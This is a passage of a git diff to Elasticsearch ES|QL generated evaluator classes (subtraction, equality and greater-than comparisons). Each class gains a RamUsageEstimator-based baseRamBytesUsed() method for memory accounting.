IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java index 5ff2efe3f6683..61847eeb81696 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SubLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java index 856399ba0e4af..b59cae725fb93 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SubUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java index 70a3f0bd70aab..3c5c47424bd32 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsBoolsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsBoolsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock lhsBlock, BooleanBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java index 80e20c27d5485..064997668c6bd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java index 16f83442f79d5..12bf47ce25978 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsGeometriesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsGeometriesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java index b78f45d7fbd1e..ae55fc132a740 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java index e65359e8ee156..376cde3ed2465 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java index c8bde6b05afd2..e81fe893b234e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
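A second detail visible in the BytesRef-backed evaluators here (EqualsKeywordsEvaluator, EqualsGeometriesEvaluator, and the keyword ordering evaluators further down): eval allocates one BytesRef scratch per operand up front and reuses it for every position, rather than materializing a new object per row. A hedged illustration of that reuse pattern; BytesColumn is a made-up stand-in for the real block type, whose accessor likewise fills a caller-supplied scratch:

import org.apache.lucene.util.BytesRef;

// Made-up minimal column of byte slices; stands in for BytesRefBlock in this sketch.
interface BytesColumn {
    int positionCount();
    BytesRef read(int position, BytesRef scratch); // fills and returns the caller's scratch
}

final class ScratchReuseSketch {
    // Counts positions where both columns hold equal bytes, reusing two scratch
    // objects across the whole loop like the generated lhsScratch/rhsScratch locals.
    static int countEqual(BytesColumn lhs, BytesColumn rhs) {
        BytesRef lhsScratch = new BytesRef();
        BytesRef rhsScratch = new BytesRef();
        int equal = 0;
        for (int p = 0; p < lhs.positionCount(); p++) {
            if (lhs.read(p, lhsScratch).equals(rhs.read(p, rhsScratch))) {
                equal++;
            }
        }
        return equal;
    }
}

In these tight per-position loops a fresh allocation per row would otherwise dominate, which is presumably why the generated code hoists the scratches out of the loop.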
*/ public final class EqualsLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java index 91cd4614cc9d5..a00e33fa9e6cf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java index cdcc4c931fb19..07ad8d201e33c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class EqualsNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java index e3f1649048c9d..1e8f09cb6e297 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java index 5014310820b06..c8cbbcf15815c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java index d99a2ff6bda70..95432b0f2c33e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java index 7d202da760601..154dcaf68b32e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java index c8c337f2af085..96ffadd9637de 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java index 54683dd07523a..a828da91e5813 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java index 10ec48cbbb8dd..704df37c48e89 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import 